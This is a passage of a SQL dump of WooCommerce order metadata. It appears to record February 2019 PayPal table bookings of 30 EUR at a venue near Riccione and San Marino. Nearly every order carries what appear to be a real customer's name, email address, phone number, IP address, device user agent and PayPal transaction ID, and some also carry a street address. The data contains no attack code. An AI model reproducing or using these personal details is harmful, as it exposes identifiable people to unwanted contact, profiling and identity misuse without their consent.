ROMAGNA'),(15025,745,'_billing_state',''),(15026,745,'_billing_postcode',''),(15027,745,'_billing_country',''),(15028,745,'_billing_email','fausto.terenzi@tiscali.it'),(15029,745,'_billing_phone','3356453471'),(15030,745,'_shipping_first_name',''),(15031,745,'_shipping_last_name',''),(15032,745,'_shipping_company',''),(15033,745,'_shipping_address_1',''),(15034,745,'_shipping_address_2',''),(15035,745,'_shipping_city',''),(15036,745,'_shipping_state',''),(15037,745,'_shipping_postcode',''),(15038,745,'_shipping_country',''),(15039,745,'_order_currency','EUR'),(15040,745,'_cart_discount','0'),(15041,745,'_cart_discount_tax','0'),(15042,745,'_order_shipping','0.00'),(15043,745,'_order_shipping_tax','0'),(15044,745,'_order_tax','0'),(15045,745,'_order_total','30.00'),(15046,745,'_order_version','3.5.4'),(15047,745,'_prices_include_tax','no'),(15048,745,'_billing_address_index','FAUSTO TERENZI  VIA MINCIO 9  MORCIANO DI ROMAGNA    fausto.terenzi@tiscali.it 3356453471'),(15049,745,'_shipping_address_index','        '),(15050,745,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(15051,745,'Numero bambini fino a 6 anni','0'),(15052,745,'Numero ragazzi fino a 13 anni','0'),(15053,745,'Files attached','[]'),(15054,745,'Payment type','instant'),(15055,745,'_paypal_status','completed'),(15056,745,'_download_permissions_granted','yes'),(15057,745,'_recorded_sales','yes'),(15058,745,'_recorded_coupon_usage_counts','yes'),(15059,745,'_order_stock_reduced','yes'),(15060,745,'PayPal Transaction Fee','1.37'),(15061,746,'_order_key','wc_order_bZ3WJbVVL6efD'),(15062,746,'_customer_user','42'),(15063,746,'_payment_method','paypal'),(15064,746,'_payment_method_title','PayPal'),(15065,746,'_transaction_id','12328429UR929500P'),(15066,746,'_customer_ip_address','91.252.109.2'),(15067,746,'_customer_user_agent','Mozilla/5.0 (Linux; Android 8.0.0; PRA-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.64 Mobile Safari/537.36'),(15068,746,'_created_via','checkout'),(15069,746,'_date_completed',''),(15070,746,'_completed_date',''),(15071,746,'_date_paid','1549882359'),(15072,746,'_paid_date','2019-02-11 11:52:39'),(15073,746,'_cart_hash','60d48b6d9b927fffe02528a2ae802c73'),(15074,746,'_billing_first_name','Tetyana'),(15075,746,'_billing_last_name','Melnyk'),(15076,746,'_billing_company',''),(15077,746,'_billing_address_1',''),(15078,746,'_billing_address_2',''),(15079,746,'_billing_city','Carpegna'),(15080,746,'_billing_state',''),(15081,746,'_billing_postcode',''),(15082,746,'_billing_country',''),(15083,746,'_billing_email','him_85@inbox.ru'),(15084,746,'_billing_phone','3388769579'),(15085,746,'_shipping_first_name',''),(15086,746,'_shipping_last_name',''),(15087,746,'_shipping_company',''),(15088,746,'_shipping_address_1',''),(15089,746,'_shipping_address_2',''),(15090,746,'_shipping_city',''),(15091,746,'_shipping_state',''),(15092,746,'_shipping_postcode',''),(15093,746,'_shipping_country',''),(15094,746,'_order_currency','EUR'),(15095,746,'_cart_discount','0'),(15096,746,'_cart_discount_tax','0'),(15097,746,'_order_shipping','0.00'),(15098,746,'_order_shipping_tax','0'),(15099,746,'_order_tax','0'),(15100,746,'_order_total','30.00'),(15101,746,'_order_version','3.5.4'),(15102,746,'_prices_include_tax','no'),(15103,746,'_billing_address_index','Tetyana Melnyk    Carpegna    him_85@inbox.ru 3388769579'),(15104,746,'_shipping_address_index','        '),(15105,746,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(15106,746,'Numero bambini fino a 6 anni','0'),(15107,746,'Numero ragazzi fino a 13 anni','0'),(15108,746,'Files attached','[]'),(15109,746,'Payment type','instant'),(15110,746,'_paypal_status','completed'),(15111,746,'_download_permissions_granted','yes'),(15112,746,'_recorded_sales','yes'),(15113,746,'_recorded_coupon_usage_counts','yes'),(15114,746,'_order_stock_reduced','yes'),(15115,746,'PayPal Transaction Fee','1.37'),(15116,106,'_yoast_wpseo_content_score','90'),(15117,758,'_order_key','wc_order_ONMPb1YWkMaT3'),(15118,758,'_customer_user','43'),(15119,758,'_payment_method','paypal'),(15120,758,'_payment_method_title','PayPal'),(15121,758,'_transaction_id','4GT19098YF968451C'),(15122,758,'_customer_ip_address','82.61.181.186'),(15123,758,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'),(15124,758,'_created_via','checkout'),(15125,758,'_date_completed',''),(15126,758,'_completed_date',''),(15127,758,'_date_paid','1549977575'),(15128,758,'_paid_date','2019-02-12 14:19:35'),(15129,758,'_cart_hash','60d48b6d9b927fffe02528a2ae802c73'),(15130,758,'_billing_first_name','Alex'),(15131,758,'_billing_last_name','Ronchi'),(15132,758,'_billing_company',''),(15133,758,'_billing_address_1','Via Riva del Garda, 15'),(15134,758,'_billing_address_2',''),(15135,758,'_billing_city','Riccione'),(15136,758,'_billing_state',''),(15137,758,'_billing_postcode',''),(15138,758,'_billing_country',''),(15139,758,'_billing_email','alex_93_5300@hotmail.it'),(15140,758,'_billing_phone','3392914713'),(15141,758,'_shipping_first_name',''),(15142,758,'_shipping_last_name',''),(15143,758,'_shipping_company',''),(15144,758,'_shipping_address_1',''),(15145,758,'_shipping_address_2',''),(15146,758,'_shipping_city',''),(15147,758,'_shipping_state',''),(15148,758,'_shipping_postcode',''),(15149,758,'_shipping_country',''),(15150,758,'_order_currency','EUR'),(15151,758,'_cart_discount','0'),(15152,758,'_cart_discount_tax','0'),(15153,758,'_order_shipping','0.00'),(15154,758,'_order_shipping_tax','0'),(15155,758,'_order_tax','0'),(15156,758,'_order_total','30.00'),(15157,758,'_order_version','3.5.4'),(15158,758,'_prices_include_tax','no'),(15159,758,'_billing_address_index','Alex Ronchi  Via Riva del Garda, 15  Riccione    alex_93_5300@hotmail.it 3392914713'),(15160,758,'_shipping_address_index','        '),(15161,758,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(15162,758,'Numero bambini fino a 6 anni','0'),(15163,758,'Numero ragazzi fino a 13 anni','0'),(15164,758,'Files attached','[]'),(15165,758,'Payment type','instant'),(15166,758,'_paypal_status','completed'),(15167,758,'_download_permissions_granted','yes'),(15168,758,'_recorded_sales','yes'),(15169,758,'_recorded_coupon_usage_counts','yes'),(15170,758,'_order_stock_reduced','yes'),(15171,758,'PayPal Transaction Fee','1.37'),(15172,761,'_order_key','wc_order_RiAeLktIDj5bN'),(15173,761,'_customer_user','44'),(15174,761,'_payment_method','paypal'),(15175,761,'_payment_method_title','PayPal'),(15176,761,'_transaction_id','3PD25406FM052890W'),(15177,761,'_customer_ip_address','109.235.104.11'),(15178,761,'_customer_user_agent','Mozilla/5.0 (Linux; Android 9; LYA-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36'),(15179,761,'_created_via','checkout'),(15180,761,'_date_completed',''),(15181,761,'_completed_date',''),(15182,761,'_date_paid','1549995527'),(15183,761,'_paid_date','2019-02-12 19:18:47'),(15184,761,'_cart_hash','60d48b6d9b927fffe02528a2ae802c73'),(15185,761,'_billing_first_name','Pietro'),(15186,761,'_billing_last_name','Fattori'),(15187,761,'_billing_company',''),(15188,761,'_billing_address_1','Contrada di Borgoloto 11'),(15189,761,'_billing_address_2',''),(15190,761,'_billing_city','San Marino'),(15191,761,'_billing_state',''),(15192,761,'_billing_postcode',''),(15193,761,'_billing_country',''),(15194,761,'_billing_email','Pietro.Fattori@hotmail.it'),(15195,761,'_billing_phone','3893465675'),(15196,761,'_shipping_first_name',''),(15197,761,'_shipping_last_name',''),(15198,761,'_shipping_company',''),(15199,761,'_shipping_address_1',''),(15200,761,'_shipping_address_2',''),(15201,761,'_shipping_city',''),(15202,761,'_shipping_state',''),(15203,761,'_shipping_postcode',''),(15204,761,'_shipping_country',''),(15205,761,'_order_currency','EUR'),(15206,761,'_cart_discount','0'),(15207,761,'_cart_discount_tax','0'),(15208,761,'_order_shipping','0.00'),(15209,761,'_order_shipping_tax','0'),(15210,761,'_order_tax','0'),(15211,761,'_order_total','30.00'),(15212,761,'_order_version','3.5.4'),(15213,761,'_prices_include_tax','no'),(15214,761,'_billing_address_index','Pietro Fattori  Contrada di Borgoloto 11  San Marino    Pietro.Fattori@hotmail.it 3893465675'),(15215,761,'_shipping_address_index','        '),(15216,761,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(15217,761,'Numero bambini fino a 6 anni','0'),(15218,761,'Numero ragazzi fino a 13 anni','0'),(15219,761,'Files attached','[]'),(15220,761,'Payment type','instant'),(15221,761,'_paypal_status','completed'),(15222,761,'_download_permissions_granted','yes'),(15223,761,'_recorded_sales','yes'),(15224,761,'_recorded_coupon_usage_counts','yes'),(15225,761,'_order_stock_reduced','yes'),(15226,761,'PayPal Transaction Fee','1.37'),(15227,762,'_order_currency','EUR'),(15228,762,'_cart_discount','0'),(15229,762,'_cart_discount_tax','0'),(15230,762,'_order_shipping','0'),(15231,762,'_order_shipping_tax','0'),(15232,762,'_order_tax','0'),(15233,762,'_order_total','-30.00'),(15234,762,'_order_version','3.5.4'),(15235,762,'_prices_include_tax','no'),(15236,762,'_refund_amount','30'),(15237,762,'_refunded_by','1'),(15238,762,'_refunded_payment',''),(15239,762,'_refund_reason','Ordine completamente rimborsato'),(15240,763,'_order_key','wc_order_jyT4FXpuXezei'),(15241,763,'_customer_user','45'),(15242,763,'_payment_method','paypal'),(15243,763,'_payment_method_title','PayPal'),(15244,763,'_transaction_id','3L3520336V9306528'),(15245,763,'_customer_ip_address','194.183.74.61'),(15246,763,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1'),(15247,763,'_created_via','checkout'),(15248,763,'_date_completed',''),(15249,763,'_completed_date',''),(15250,763,'_date_paid','1549997550'),(15251,763,'_paid_date','2019-02-12 19:52:30'),(15252,763,'_cart_hash','60d48b6d9b927fffe02528a2ae802c73'),(15253,763,'_billing_first_name','Dino'),(15254,763,'_billing_last_name','Cedalo'),(15255,763,'_billing_company',''),(15256,763,'_billing_address_1','Via Pittulo orso 25'),(15257,763,'_billing_address_2',''),(15258,763,'_billing_city','San Marino'),(15259,763,'_billing_state',''),(15260,763,'_billing_postcode',''),(15261,763,'_billing_country',''),(15262,763,'_billing_email','Denn7401@gmail.com'),(15263,763,'_billing_phone','335291370'),(15264,763,'_shipping_first_name',''),(15265,763,'_shipping_last_name',''),(15266,763,'_shipping_company',''),(15267,763,'_shipping_address_1',''),(15268,763,'_shipping_address_2',''),(15269,763,'_shipping_city',''),(15270,763,'_shipping_state',''),(15271,763,'_shipping_postcode',''),(15272,763,'_shipping_country',''),(15273,763,'_order_currency','EUR'),(15274,763,'_cart_discount','0'),(15275,763,'_cart_discount_tax','0'),(15276,763,'_order_shipping','0.00'),(15277,763,'_order_shipping_tax','0'),(15278,763,'_order_tax','0'),(15279,763,'_order_total','30.00'),(15280,763,'_order_version','3.5.4'),(15281,763,'_prices_include_tax','no'),(15282,763,'_billing_address_index','Dino Cedalo  Via Pittulo orso 25  San Marino    Denn7401@gmail.com 335291370'),(15283,763,'_shipping_address_index','        '),(15284,763,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(15285,763,'Numero bambini fino a 6 anni','0'),(15286,763,'Numero ragazzi fino a 13 anni','0'),(15287,763,'Files attached','[]'),(15288,763,'Payment type','instant'),(15289,763,'_paypal_status','completed'),(15290,763,'_download_permissions_granted','yes'),(15291,763,'_recorded_sales','yes'),(15292,763,'_recorded_coupon_usage_counts','yes'),(15293,763,'_order_stock_reduced','yes'),(15294,763,'PayPal Transaction Fee','1.37'),(15295,764,'_order_key','wc_order_mJnSPEMH4WVoc'),(15296,764,'_customer_user','0'),(15297,764,'_payment_method','paypal'),(15298,764,'_payment_method_title','PayPal'),(15299,764,'_transaction_id','0D372052YN3761005'),(15300,764,'_customer_ip_address','109.235.107.2'),(15301,764,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.96 Safari/537.36'),(15302,764,'_created_via','checkout'),(15303,764,'_date_completed',''),(15304,764,'_completed_date',''),(15305,764,'_date_paid','1550052758'),(15306,764,'_paid_date','2019-02-13 11:12:38'),(15307,764,'_cart_hash','60d48b6d9b927fffe02528a2ae802c73'),(15308,764,'_billing_first_name','Michele'),(15309,764,'_billing_last_name','Giannoni'),(15310,764,'_billing_company',''),(15311,764,'_billing_address_1',''),(15312,764,'_billing_address_2',''),(15313,764,'_billing_city',''),(15314,764,'_billing_state',''),(15315,764,'_billing_postcode',''),(15316,764,'_billing_country',''),(15317,764,'_billing_email','michelegianno52@gmail.com'),(15318,764,'_billing_phone','3347396967'),(15319,764,'_shipping_first_name',''),(15320,764,'_shipping_last_name',''),(15321,764,'_shipping_company',''),(15322,764,'_shipping_address_1',''),(15323,764,'_shipping_address_2',''),(15324,764,'_shipping_city',''),(15325,764,'_shipping_state',''),(15326,764,'_shipping_postcode',''),(15327,764,'_shipping_country',''),(15328,764,'_order_currency','EUR'),(15329,764,'_cart_discount','0'),(15330,764,'_cart_discount_tax','0'),(15331,764,'_order_shipping','0.00'),(15332,764,'_order_shipping_tax','0'),(15333,764,'_order_tax','0'),(15334,764,'_order_total','30.00'),(15335,764,'_order_version','3.5.4'),(15336,764,'_prices_include_tax','no'),(15337,764,'_billing_address_index','Michele Giannoni        michelegianno52@gmail.com 3347396967'),(15338,764,'_shipping_address_index','        '),(15339,764,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(15340,764,'Numero bambini fino a 6 anni','0'),(15341,764,'Numero ragazzi fino a 13 anni','0'),(15342,764,'Files attached','[]'),(15343,764,'Payment type','instant'),(15344,764,'_paypal_status','completed'),(15345,764,'_download_permissions_granted','yes'),(15346,764,'_recorded_sales','yes'),(15347,764,'_recorded_coupon_usage_counts','yes'),(15348,764,'_order_stock_reduced','yes'),(15349,764,'PayPal Transaction Fee','1.37'),(15350,765,'_order_key','wc_order_RI5CJAHyEksFc'),(15351,765,'_customer_user','0'),(15352,765,'_payment_method','paypal'),(15353,765,'_payment_method_title','PayPal'),(15354,765,'_transaction_id','1E9441905G765934A'),(15355,765,'_customer_ip_address','151.36.254.190'),(15356,765,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1'),(15357,765,'_created_via','checkout'),(15358,765,'_date_completed',''),(15359,765,'_completed_date',''),(15360,765,'_date_paid','1550056474'),(15361,765,'_paid_date','2019-02-13 12:14:34'),(15362,765,'_cart_hash','60d48b6d9b927fffe02528a2ae802c73'),(15363,765,'_billing_first_name','Manuele'),(15364,765,'_billing_last_name','Montanari'),(15365,765,'_billing_company',''),(15366,765,'_billing_address_1',''),(15367,765,'_billing_address_2',''),(15368,765,'_billing_city',''),(15369,765,'_billing_state',''),(15370,765,'_billing_postcode',''),(15371,765,'_billing_country',''),(15372,765,'_billing_email','blockslugo@libero.it'),(15373,765,'_billing_phone','3479483182'),(15374,765,'_shipping_first_name',''),(15375,765,'_shipping_last_name',''),(15376,765,'_shipping_company',''),(15377,765,'_shipping_address_1',''),(15378,765,'_shipping_address_2',''),(15379,765,'_shipping_city',''),(15380,765,'_shipping_state',''),(15381,765,'_shipping_postcode',''),(15382,765,'_shipping_country',''),(15383,765,'_order_currency','EUR'),(15384,765,'_cart_discount','0'),(15385,765,'_cart_discount_tax','0'),(15386,765,'_order_shipping','0.00'),(15387,765,'_order_shipping_tax','0'),(15388,765,'_order_tax','0'),(15389,765,'_order_total','30.00'),(15390,765,'_order_version','3.5.4'),(15391,765,'_prices_include_tax','no'),(15392,765,'_billing_address_index','Manuele Montanari        blockslugo@libero.it 3479483182'),(15393,765,'_shipping_address_index','        '),(15394,765,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(15395,765,'Numero bambini fino a 6 anni','0'),(15396,765,'Numero ragazzi fino a 13 anni','0'),(15397,765,'Files attached','[]'),(15398,765,'Payment type','instant'),(15399,765,'_paypal_status','completed'),(15400,765,'_download_permissions_granted','yes'),(15401,765,'_recorded_sales','yes'),(15402,765,'_recorded_coupon_usage_counts','yes'),(15403,765,'_order_stock_reduced','yes'),(15404,765,'PayPal Transaction Fee','1.37'),(15405,766,'_order_key','wc_order_mx8cJi83GAiEz'),(15406,766,'_customer_user','0'),(15407,766,'_payment_method','paypal'),(15408,766,'_payment_method_title','PayPal'),(15409,766,'_transaction_id','2CN08076KA2303523'),(15410,766,'_customer_ip_address','5.90.223.179'),(15411,766,'_customer_user_agent','Mozilla/5.0 (Linux; Android 8.0.0; VKY-L09) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.96 Mobile Safari/537.36'),(15412,766,'_created_via','checkout'),(15413,766,'_date_completed',''),(15414,766,'_completed_date',''),(15415,766,'_date_paid','1550064711'),(15416,766,'_paid_date','2019-02-13 14:31:51'),(15417,766,'_cart_hash','60d48b6d9b927fffe02528a2ae802c73'),(15418,766,'_billing_first_name','Paolo'),(15419,766,'_billing_last_name','Pizzolante'),(15420,766,'_billing_company',''),(15421,766,'_billing_address_1','PlanGreen, Corso Fratelli Cervi 51'),(15422,766,'_billing_address_2',''),(15423,766,'_billing_city','Riccione'),(15424,766,'_billing_state',''),(15425,766,'_billing_postcode',''),(15426,766,'_billing_country',''),(15427,766,'_billing_email','paolopizzolante@gmail.com'),(15428,766,'_billing_phone','3314489325'),(15429,766,'_shipping_first_name',''),(15430,766,'_shipping_last_name',''),(15431,766,'_shipping_company',''),(15432,766,'_shipping_address_1',''),(15433,766,'_shipping_address_2',''),(15434,766,'_shipping_city',''),(15435,766,'_shipping_state',''),(15436,766,'_shipping_postcode',''),(15437,766,'_shipping_country',''),(15438,766,'_order_currency','EUR'),(15439,766,'_cart_discount','0'),(15440,766,'_cart_discount_tax','0'),(15441,766,'_order_shipping','0.00'),(15442,766,'_order_shipping_tax','0'),(15443,766,'_order_tax','0'),(15444,766,'_order_total','30.00'),(15445,766,'_order_version','3.5.4'),(15446,766,'_prices_include_tax','no'),(15447,766,'_billing_address_index','Paolo Pizzolante  PlanGreen, Corso Fratelli Cervi 51  Riccione    paolopizzolante@gmail.com 3314489325'),(15448,766,'_shipping_address_index','        '),(15449,766,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(15450,766,'Numero bambini fino a 6 anni','0'),(15451,766,'Numero ragazzi fino a 13 anni','0'),(15452,766,'Files attached','[]'),(15453,766,'Payment type','instant'),(15454,766,'_paypal_status','completed'),(15455,766,'_download_permissions_granted','yes'),(15456,766,'_recorded_sales','yes'),(15457,766,'_recorded_coupon_usage_counts','yes'),(15458,766,'_order_stock_reduced','yes'),(15459,766,'PayPal Transaction Fee','1.37'),(15460,767,'_order_key','wc_order_JROBweoP3TOin'),(15461,767,'_customer_user','0'),(15462,767,'_payment_method','paypal'),(15463,767,'_payment_method_title','PayPal'),(15464,767,'_transaction_id','52519374V35889313'),(15465,767,'_customer_ip_address','193.43.97.18'),(15466,767,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0'),(15467,767,'_created_via','checkout'),(15468,767,'_date_completed',''),(15469,767,'_completed_date',''),(15470,767,'_date_paid','1550067552'),(15471,767,'_paid_date','2019-02-13 15:19:12'),(15472,767,'_cart_hash','60d48b6d9b927fffe02528a2ae802c73'),(15473,767,'_billing_first_name','Giulio Maria'),(15474,767,'_billing_last_name','Marcheggiani Muccioli'),(15475,767,'_billing_company',''),(15476,767,'_billing_address_1',''),(15477,767,'_billing_address_2',''),(15478,767,'_billing_city',''),(15479,767,'_billing_state',''),(15480,767,'_billing_postcode',''),(15481,767,'_billing_country',''),(15482,767,'_billing_email','marcheggianimuccioli@me.com'),(15483,767,'_billing_phone','3285626926'),(15484,767,'_shipping_first_name',''),(15485,767,'_shipping_last_name',''),(15486,767,'_shipping_company',''),(15487,767,'_shipping_address_1',''),(15488,767,'_shipping_address_2',''),(15489,767,'_shipping_city',''),(15490,767,'_shipping_state',''),(15491,767,'_shipping_postcode',''),(15492,767,'_shipping_country',''),(15493,767,'_order_currency','EUR'),(15494,767,'_cart_discount','0'),(15495,767,'_cart_discount_tax','0'),(15496,767,'_order_shipping','0.00'),(15497,767,'_order_shipping_tax','0'),(15498,767,'_order_tax','0'),(15499,767,'_order_total','30.00'),(15500,767,'_order_version','3.5.4'),(15501,767,'_prices_include_tax','no'),(15502,767,'_billing_address_index','Giulio Maria Marcheggiani Muccioli        marcheggianimuccioli@me.com 3285626926'),(15503,767,'_shipping_address_index','        '),(15504,767,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(15505,767,'Numero bambini fino a 6 anni','0'),(15506,767,'Numero ragazzi fino a 13 anni','0'),(15507,767,'Files attached','[]'),(15508,767,'Payment type','instant'),(15509,767,'_paypal_status','completed'),(15510,767,'_download_permissions_granted','yes'),(15511,767,'_recorded_sales','yes'),(15512,767,'_recorded_coupon_usage_counts','yes'),(15513,767,'_order_stock_reduced','yes'),(15514,767,'PayPal Transaction Fee','1.37'),(15515,768,'_order_key','wc_order_yMbLlQxY4xFmA'),(15516,768,'_customer_user','0'),(15517,768,'_payment_method','paypal'),(15518,768,'_payment_method_title','PayPal'),(15519,768,'_transaction_id','3W724086EE5199311'),(15520,768,'_customer_ip_address','213.152.212.61'),(15521,768,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/66.0.230776083 Mobile/15E148 Safari/605.1'),(15522,768,'_created_via','checkout'),(15523,768,'_date_completed',''),(15524,768,'_completed_date',''),(15525,768,'_date_paid','1550068310'),(15526,768,'_paid_date','2019-02-13 15:31:50'),(15527,768,'_cart_hash','60d48b6d9b927fffe02528a2ae802c73'),(15528,768,'_billing_first_name','Cecilia'),(15529,768,'_billing_last_name','Faletto'),(15530,768,'_billing_company',''),(15531,768,'_billing_address_1',''),(15532,768,'_billing_address_2',''),(15533,768,'_billing_city',''),(15534,768,'_billing_state',''),(15535,768,'_billing_postcode',''),(15536,768,'_billing_country',''),(15537,768,'_billing_email','cecilia_faletto@hotmail.com'),(15538,768,'_billing_phone','3204119822'),(15539,768,'_shipping_first_name',''),(15540,768,'_shipping_last_name',''),(15541,768,'_shipping_company',''),(15542,768,'_shipping_address_1',''),(15543,768,'_shipping_address_2',''),(15544,768,'_shipping_city',''),(15545,768,'_shipping_state',''),(15546,768,'_shipping_postcode',''),(15547,768,'_shipping_country',''),(15548,768,'_order_currency','EUR'),(15549,768,'_cart_discount','0'),(15550,768,'_cart_discount_tax','0'),(15551,768,'_order_shipping','0.00'),(15552,768,'_order_shipping_tax','0'),(15553,768,'_order_tax','0'),(15554,768,'_order_total','30.00'),(15555,768,'_order_version','3.5.4'),(15556,768,'_prices_include_tax','no'),(15557,768,'_billing_address_index','Cecilia Faletto        cecilia_faletto@hotmail.com 3204119822'),(15558,768,'_shipping_address_index','        '),(15559,768,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(15560,768,'Numero bambini fino a 6 anni','0'),(15561,768,'Numero ragazzi fino a 13 anni','0'),(15562,768,'Files attached','[]'),(15563,768,'Payment type','instant'),(15564,768,'_paypal_status','completed'),(15565,768,'_download_permissions_granted','yes'),(15566,768,'_recorded_sales','yes'),(15567,768,'_recorded_coupon_usage_counts','yes'),(15568,768,'_order_stock_reduced','yes'),(15569,768,'PayPal Transaction Fee','1.37'),(15570,769,'_order_key','wc_order_ekQe9X0QUARJ8'),(15571,769,'_customer_user','7'),(15572,769,'_payment_method','paypal'),(15573,769,'_payment_method_title','PayPal'),(15574,769,'_transaction_id','636949702V419652U'),(15575,769,'_customer_ip_address','77.242.222.3'),(15576,769,'_customer_user_agent','Mozilla/5.0 (Linux; Android 9; CLT-L09) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36'),(15577,769,'_created_via','checkout'),(15578,769,'_date_completed',''),(15579,769,'_completed_date',''),(15580,769,'_date_paid','1550083152'),(15581,769,'_paid_date','2019-02-13 19:39:12'),(15582,769,'_cart_hash','60d48b6d9b927fffe02528a2ae802c73'),(15583,769,'_billing_first_name','Laura'),(15584,769,'_billing_last_name','Ugolini'),(15585,769,'_billing_company',''),(15586,769,'_billing_address_1','strada cardio 91B'),(15587,769,'_billing_address_2',''),(15588,769,'_billing_city','serravalle rsm'),(15589,769,'_billing_state',''),(15590,769,'_billing_postcode',''),(15591,769,'_billing_country',''),(15592,769,'_billing_email','lauraugolini87@gmail.com'),(15593,769,'_billing_phone','3385403481'),(15594,769,'_shipping_first_name',''),(15595,769,'_shipping_last_name',''),(15596,769,'_shipping_company',''),(15597,769,'_shipping_address_1',''),(15598,769,'_shipping_address_2',''),(15599,769,'_shipping_city',''),(15600,769,'_shipping_state',''),(15601,769,'_shipping_postcode',''),(15602,769,'_shipping_country',''),(15603,769,'_order_currency','EUR'),(15604,769,'_cart_discount','0'),(15605,769,'_cart_discount_tax','0'),(15606,769,'_order_shipping','0.00'),(15607,769,'_order_shipping_tax','0'),(15608,769,'_order_tax','0'),(15609,769,'_order_total','30.00'),(15610,769,'_order_version','3.5.4'),(15611,769,'_prices_include_tax','no'),(15612,769,'_billing_address_index','Laura Ugolini  strada cardio 91B  serravalle rsm    lauraugolini87@gmail.com 3385403481'),(15613,769,'_shipping_address_index','        '),(15614,769,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(15615,769,'Numero bambini fino a 6 anni','1'),(15616,769,'Numero ragazzi fino a 13 anni','0'),(15617,769,'Files attached','[]'),(15618,769,'Payment type','instant'),(15619,769,'_paypal_status','completed'),(15620,769,'_download_permissions_granted','yes'),(15621,769,'_recorded_sales','yes'),(15622,769,'_recorded_coupon_usage_counts','yes'),(15623,769,'_order_stock_reduced','yes'),(15624,769,'PayPal Transaction Fee','1.37'),(15625,770,'_order_key','wc_order_QtI5TZRUaIW9h'),(15626,770,'_customer_user','0'),(15627,770,'_payment_method','paypal'),(15628,770,'_payment_method_title','PayPal'),(15629,770,'_transaction_id','83D53299FD166692J'),(15630,770,'_customer_ip_address','93.147.151.170'),(15631,770,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(15632,770,'_created_via','checkout'),(15633,770,'_date_completed',''),(15634,770,'_completed_date',''),(15635,770,'_date_paid','1550135014'),(15636,770,'_paid_date','2019-02-14 10:03:34'),(15637,770,'_cart_hash','60d48b6d9b927fffe02528a2ae802c73'),(15638,770,'_billing_first_name','Andrea'),(15639,770,'_billing_last_name','Grossi'),(15640,770,'_billing_company',''),(15641,770,'_billing_address_1','via Borsellino 10'),(15642,770,'_billing_address_2',''),(15643,770,'_billing_city','Misano Adriatico'),(15644,770,'_billing_state',''),(15645,770,'_billing_postcode',''),(15646,770,'_billing_country',''),(15647,770,'_billing_email','andreagrossi23@gmail.com'),(15648,770,'_billing_phone','3397679753'),(15649,770,'_shipping_first_name',''),(15650,770,'_shipping_last_name',''),(15651,770,'_shipping_company',''),(15652,770,'_shipping_address_1',''),(15653,770,'_shipping_address_2',''),(15654,770,'_shipping_city',''),(15655,770,'_shipping_state',''),(15656,770,'_shipping_postcode',''),(15657,770,'_shipping_country',''),(15658,770,'_order_currency','EUR'),(15659,770,'_cart_discount','0'),(15660,770,'_cart_discount_tax','0'),(15661,770,'_order_shipping','0.00'),(15662,770,'_order_shipping_tax','0'),(15663,770,'_order_tax','0'),(15664,770,'_order_total','30.00'),(15665,770,'_order_version','3.5.4'),(15666,770,'_prices_include_tax','no'),(15667,770,'_billing_address_index','Andrea Grossi  via Borsellino 10  Misano Adriatico    andreagrossi23@gmail.com 3397679753'),(15668,770,'_shipping_address_index','        '),(15669,770,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(15670,770,'Numero bambini fino a 6 anni','0'),(15671,770,'Numero ragazzi fino a 13 anni','0'),(15672,770,'Files attached','[]'),(15673,770,'Payment type','instant'),(15674,770,'_paypal_status','completed'),(15675,770,'_download_permissions_granted','yes'),(15676,770,'_recorded_sales','yes'),(15677,770,'_recorded_coupon_usage_counts','yes'),(15678,770,'_order_stock_reduced','yes'),(15679,770,'PayPal Transaction Fee','1.37'),(15680,771,'_order_key','wc_order_gvXKdbo5y3Ndi'),(15681,771,'_customer_user','46'),(15682,771,'_payment_method','paypal'),(15683,771,'_payment_method_title','PayPal'),(15684,771,'_transaction_id','6EC33339CG9426505'),(15685,771,'_customer_ip_address','37.160.26.248'),(15686,771,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1'),(15687,771,'_created_via','checkout'),(15688,771,'_date_completed',''),(15689,771,'_completed_date',''),(15690,771,'_date_paid','1550142282'),(15691,771,'_paid_date','2019-02-14 